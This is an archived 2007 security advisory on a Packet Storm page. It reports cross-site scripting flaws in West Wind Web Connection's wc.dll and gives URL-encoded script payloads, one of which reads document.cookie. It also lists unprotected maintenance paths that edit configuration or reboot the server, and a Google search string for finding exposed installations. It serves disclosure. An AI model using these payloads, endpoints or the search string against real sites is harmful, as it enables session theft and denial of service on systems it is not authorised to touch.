exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wconnect-xss.txt

wconnect-xss.txt
Posted Dec 18, 2007
Authored by DoZ | Site hackerscenter.com

The West Wind Web Connection tool is susceptible to multiple cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss
SHA-256 | 0ae6d1915e6df045a8a8b8bd7296cba8ffca348ccd8d0c49f4093db7582242a3

wconnect-xss.txt

Change Mirror Download
 [HSC] WCONNECT WC.DLL Cross-Site Scripting Vulnerability

West Wind Web Connection is a tool for building Web applications using the
Visual FoxPro environment but is also Vulnerable to Cross-Site scripting
attacks. Admins need to password protect the application since its installed
with out password on default. Also senatize the code to disallow xss attacks
or javascript.



Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Risk: Medium
Class: Cross Site Scripting
Remote: YES
Local: Yes


Vendor: West Wind Technologies http://www.west-wind.com
Product Version: All Versions



* Attackers can exploit these issues via a web client.



Examples:

/wc.dll?=%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E
/wiki/wc.dll?AA~%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E
/wc.dll?Wiki~Admin/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E


Remote Privileges Escalation: (Password Unprotected Application)


Log - /wc.dll?wwmaint~showlog
ISAPI Configuration - /wc.dll?_maintain~ShowStatus
DLL Error Log - /wc.dll?wwMaint~wcDLLErrorLog
Server Status - /wc.dll?wwMaint~ServerStatus
View of settings - /wc.dll?wwmaint~ShowStatus
Editing Config Files - /wc.dll?wwMaint~EditConfig
Reboot Machine - /wc.dll?wwMaint~RebootMachine
Restart IIS - /wc.dll?wwMaint~RebootMachine~&RestartOnly=On
Web Connection Kill - /wc.dll?wwmaint~sessions~KILL





Google Search:

http://www.google.com/search?q=ext%3Adll+inurl%3A%28wc%29&btnG=Search&hl=en


Only becoming a Ethical Hacker, you can stop a Hacker. Learn with out having
to pay thousands!- http://kit.hackerscenter.com - The most comprehensive
security
pack you will ever find on the net!
------------------------------
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close